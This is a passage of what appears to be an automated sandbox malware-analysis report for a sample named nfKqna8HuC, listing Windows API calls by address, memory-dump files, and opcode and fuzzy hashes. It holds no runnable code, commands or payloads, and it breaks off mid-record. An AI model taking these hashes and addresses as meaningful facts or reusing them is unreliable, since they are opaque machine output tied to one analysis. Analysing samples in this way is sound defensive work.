                                                                    • IsMenu.USER32(00000000), ref: 00664B7B
                                                                    • CreatePopupMenu.USER32 ref: 00664BAF
                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00664C0D
                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00664C3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                    • String ID:
                                                                    • API String ID: 3311875123-0
                                                                    • Opcode ID: 1dc8f433bf4a37a7bc5764920242e9a76588426fe349d0dac16252ec41c61fdd
                                                                    • Instruction ID: 477705b9b050608043c9db708151db3d5cc8a7400e33566d61c28d7adab89c5f
                                                                    • Opcode Fuzzy Hash: 1dc8f433bf4a37a7bc5764920242e9a76588426fe349d0dac16252ec41c61fdd
                                                                    • Instruction Fuzzy Hash: 3551FE70A02209EFCF25CF68C888BEEBBF6AF45318F148159E4259B391EB709D44CB51
                                                                    APIs
                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00678E7C
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678E89
                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00678EAD
                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00678EC5
                                                                    • _strlen.LIBCMT ref: 00678EF7
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00678F6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_strlenselect
                                                                    • String ID:
                                                                    • API String ID: 2217125717-0
                                                                    • Opcode ID: 405bc44b3e118090553274be1299b080e295526eab02cef92a1fcb809f7a685b
                                                                    • Instruction ID: 2b53d5a0bae012429a7175e435184cbebcf703db0516080e5650a1a6d9603c59
                                                                    • Opcode Fuzzy Hash: 405bc44b3e118090553274be1299b080e295526eab02cef92a1fcb809f7a685b
                                                                    • Instruction Fuzzy Hash: 5C41AE71500204AFCB58EBA4DD89EEEB7BBAF48350F10825DF51A97291DF30AE40CB64
                                                                    APIs
                                                                      • Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F
                                                                    • BeginPaint.USER32(?,?,?), ref: 0063AC2A
                                                                    • GetWindowRect.USER32(?,?), ref: 0063AC8E
                                                                    • ScreenToClient.USER32(?,?), ref: 0063ACAB
                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0063ACBC
                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0063AD06
                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0069E673
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                    • String ID:
                                                                    • API String ID: 2592858361-0
                                                                    • Opcode ID: ebacdbf333bbd0529e8599527c2091f9b31f372aaa35c0e3a9c1ba98e42fb8c5
                                                                    • Instruction ID: 3d25c0f845e5d2091e46403fb2f16bfea2a81d04aab27c27c05561df73a216b8
                                                                    • Opcode Fuzzy Hash: ebacdbf333bbd0529e8599527c2091f9b31f372aaa35c0e3a9c1ba98e42fb8c5
                                                                    • Instruction Fuzzy Hash: 0B41B2701043009FC710DF64CC84FB67BEAEB5A720F14166DF9A58B2A1D731A945EBA2
                                                                    APIs
                                                                    • ShowWindow.USER32(006E1628,00000000,006E1628,00000000,00000000,006E1628,?,0069DC5D,00000000,?,00000000,00000000,00000000,?,0069DAD1,00000004), ref: 0068E40B
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0068E42F
                                                                    • ShowWindow.USER32(006E1628,00000000), ref: 0068E48F
                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0068E4A1
                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0068E4C5
                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0068E4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                    • String ID:
                                                                    • API String ID: 642888154-0
                                                                    • Opcode ID: 9df7b9ee3fa219420067c7502354be30e33f66623fd92ab94ae5b8f5661c077c
                                                                    • Instruction ID: 8db79d3be072b72d4769000e4440133738216f65b5b5023ee3fe456db259a91b
                                                                    • Opcode Fuzzy Hash: 9df7b9ee3fa219420067c7502354be30e33f66623fd92ab94ae5b8f5661c077c
                                                                    • Instruction Fuzzy Hash: F7415034601141EFDB26EF24C499FD47BE2BF09304F5882A9EA5D8F6A2C772E845CB51
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006698D1
                                                                      • Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
                                                                      • Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00669908
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00669924
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0066999E
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006699B3
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006699D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 2537439066-0
                                                                    • Opcode ID: ddd2ef341663a8902a2511f262647d508a200ea6f657fea0e92fbd5140ea2614
                                                                    • Instruction ID: 31cf342e2f0784cb8577bf5626a1e39aa5778dd0f6bb72b0096ef056f3b1c0fd
                                                                    • Opcode Fuzzy Hash: ddd2ef341663a8902a2511f262647d508a200ea6f657fea0e92fbd5140ea2614
                                                                    • Instruction Fuzzy Hash: 05318131900205EBDB50EF94DC85EAEB7BAFF45710F1480A9F905AB246D734EE10CBA4
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,006777F4,?,?,00000000,00000001), ref: 00679B53
                                                                      • Part of subcall function 00676544: GetWindowRect.USER32(?,?), ref: 00676557
                                                                    • GetDesktopWindow.USER32 ref: 00679B7D
                                                                    • GetWindowRect.USER32(00000000), ref: 00679B84
                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00679BB6
                                                                      • Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0
                                                                    • GetCursorPos.USER32(?), ref: 00679BE2
                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00679C44
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                    • String ID:
                                                                    • API String ID: 4137160315-0
                                                                    • Opcode ID: 0b1816838a1b32a20440e01a07f0e1ae104f2ec95aafc7a298a42a242bbafb83
                                                                    • Instruction ID: 8dc2ba17fbf936b8390ead41a8dae9f117644dfd43b8894968a15e43131be572
                                                                    • Opcode Fuzzy Hash: 0b1816838a1b32a20440e01a07f0e1ae104f2ec95aafc7a298a42a242bbafb83
                                                                    • Instruction Fuzzy Hash: 8931D072504305ABD710EF54DC49F9BB7EAFF89314F00092AF589D7291DA71EA08CBA2
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0065AFAE
                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0065AFB5
                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0065AFC4
                                                                    • CloseHandle.KERNEL32(00000004), ref: 0065AFCF
                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065AFFE
                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0065B012
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                    • String ID:
                                                                    • API String ID: 1413079979-0
                                                                    • Opcode ID: 1e0e11cb14bbd76799caa37ed3320e1e18c3300444021e6632b22d6b4a22a8a7
                                                                    • Instruction ID: 8562553cfe3168b4d497ea221d04f9348d0c0dbd8c9ce3dcd98913a3a171db05
                                                                    • Opcode Fuzzy Hash: 1e0e11cb14bbd76799caa37ed3320e1e18c3300444021e6632b22d6b4a22a8a7
                                                                    • Instruction Fuzzy Hash: 582149B2100209AFDF029FA4DD09BEE7BAAAB45305F044115FE02A2261C376DD29EB61
                                                                    APIs
                                                                      • Part of subcall function 0063AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
                                                                      • Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063AFF2
                                                                      • Part of subcall function 0063AF83: BeginPath.GDI32(?), ref: 0063B009
                                                                      • Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063B033
                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0068EC20
                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0068EC34
                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068EC42
                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0068EC52
                                                                    • EndPath.GDI32(00000000), ref: 0068EC62
                                                                    • StrokePath.GDI32(00000000), ref: 0068EC72
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                    • String ID:
                                                                    • API String ID: 43455801-0
                                                                    • Opcode ID: bbcd0f31d4ea46d79ed38b445903d2c93cc013b44eb515ddb3b155bf2f15063f
                                                                    • Instruction ID: 18d300d29527f9052ba6b213a235ff6a2118256061d78398ab24a01d6b7f3d66
                                                                    • Opcode Fuzzy Hash: bbcd0f31d4ea46d79ed38b445903d2c93cc013b44eb515ddb3b155bf2f15063f
                                                                    • Instruction Fuzzy Hash: 7A111B7240014DBFEF02AF90DC88EEA7F6EEF09354F048116BE1989160D771AE55DBA0
                                                                    APIs
                                                                    • GetDC.USER32(00000000), ref: 0065E1C0
                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0065E1D1
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0065E1D8
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0065E1E0
                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0065E1F7
                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0065E209
                                                                      • Part of subcall function 00659AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00659A05,00000000,00000000,?,00659DDB), ref: 0065A53A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                    • String ID:
                                                                    • API String ID: 603618608-0
                                                                    • Opcode ID: 26d4b42785beaf28bf48fc592ccdb26f863af864b5d9216f0073160bc4bd472c
                                                                    • Instruction ID: f3a340edee6fc5feb9403313a42f411017c843076e808a7092235fcdcfb20fba
                                                                    • Opcode Fuzzy Hash: 26d4b42785beaf28bf48fc592ccdb26f863af864b5d9216f0073160bc4bd472c
                                                                    • Instruction Fuzzy Hash: BB018FB5A40614BFEF10AFA6CC45B5EBFBAEB49351F008066EE05A7390D6719D01CFA0
                                                                    APIs
                                                                    • __init_pointers.LIBCMT ref: 00647B47
                                                                      • Part of subcall function 0064123A: __initp_misc_winsig.LIBCMT ref: 0064125E
                                                                      • Part of subcall function 0064123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00647F51
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00647F65
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00647F78
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00647F8B
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00647F9E
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00647FB1
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00647FC4
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00647FD7
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00647FEA
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00647FFD
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00648010
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00648023
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00648036
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00648049
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0064805C
                                                                      • Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0064806F
                                                                    • __mtinitlocks.LIBCMT ref: 00647B4C
                                                                      • Part of subcall function 00647E23: InitializeCriticalSectionAndSpinCount.KERNEL32(006DAC68,00000FA0,?,?,00647B51,00645E77,006D6C70,00000014), ref: 00647E41
                                                                    • __mtterm.LIBCMT ref: 00647B55
                                                                      • Part of subcall function 00647BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00647B5A,00645E77,006D6C70,00000014), ref: 00647D3F
                                                                      • Part of subcall function 00647BBD: _free.LIBCMT ref: 00647D46
                                                                      • Part of subcall function 00647BBD: DeleteCriticalSection.KERNEL32(006DAC68,?,?,00647B5A,00645E77,006D6C70,00000014), ref: 00647D68
                                                                    • __calloc_crt.LIBCMT ref: 00647B7A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00647BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                    • String ID:
                                                                    • API String ID: 2942034483-0
                                                                    • Opcode ID: 2433d9aba240eef7fcd7802c9ddd219f36f8b963e1d9e6661d9b5e9ab8ac4622
                                                                    • Instruction ID: ebbad292b1b2cbe816db4e6f7177dbecf192e0b9ac05b37364cac5fe0880067f
                                                                    • Opcode Fuzzy Hash: 2433d9aba240eef7fcd7802c9ddd219f36f8b963e1d9e6661d9b5e9ab8ac4622
                                                                    • Instruction Fuzzy Hash: C1F0903251D31219E7A47F74BC46A8B2787DF02734B200BAEF964D55E2FF21984145A9
                                                                    APIs
                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0062281D
                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00622825
                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00622830
                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0062283B
                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00622843
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0062284B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual
                                                                    • String ID:
                                                                    • API String ID: 4278518827-0
                                                                    • Opcode ID: f775d17afa69e1e263c5f751d04d1adb0f023cd3be7502e4718c4ae01998a0c0
                                                                    • Instruction ID: 6f3d3b254f384ae59b838ef55b26f64f3abf50771bf3d30c6584a67e31a1c214
                                                                    • Opcode Fuzzy Hash: f775d17afa69e1e263c5f751d04d1adb0f023cd3be7502e4718c4ae01998a0c0
                                                                    • Instruction Fuzzy Hash: 500144B0902B5ABDE3009F6A8C85A52FEA8FF19354F00411BA15C47A42C7B5A864CBE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                    • String ID:
                                                                    • API String ID: 1423608774-0
                                                                    • Opcode ID: b541005bb33ee226cc1cee5310a0f2f931f32b51d74032b2abaf0a6ef0715811
                                                                    • Instruction ID: 32a2a3183d694b7c018ae2c92480d77570185d0d2eb9b9611da9890111ee698e
                                                                    • Opcode Fuzzy Hash: b541005bb33ee226cc1cee5310a0f2f931f32b51d74032b2abaf0a6ef0715811
                                                                    • Instruction Fuzzy Hash: E601A936101211ABD7152B94EC48EEB77AFFF89701704142DFA0396594DB74B900DF60
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00667C07
                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00667C1D
                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00667C2C
                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C3B
                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C45
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                    • String ID:
                                                                    • API String ID: 839392675-0
                                                                    • Opcode ID: 367e2bfe8ec42159f5703d48497bfe36242408118fe01af83e88392f4bbd1d72
                                                                    • Instruction ID: 7a46fbea8bfe481f39a55c2f0840aa49b386b70e367513da1c647074a94b38b3
                                                                    • Opcode Fuzzy Hash: 367e2bfe8ec42159f5703d48497bfe36242408118fe01af83e88392f4bbd1d72
                                                                    • Instruction Fuzzy Hash: 91F03A72241158BBE7216B529C0EEEF7BBDEFC7B15F041018FA0291591D7A06E41CAB5
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00669A33
                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A44
                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A51
                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A5E
                                                                      • Part of subcall function 006693D1: CloseHandle.KERNEL32(?,?,00669A6B,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 006693DB
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00669A71
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A78
                                                                    Memory Dump Source
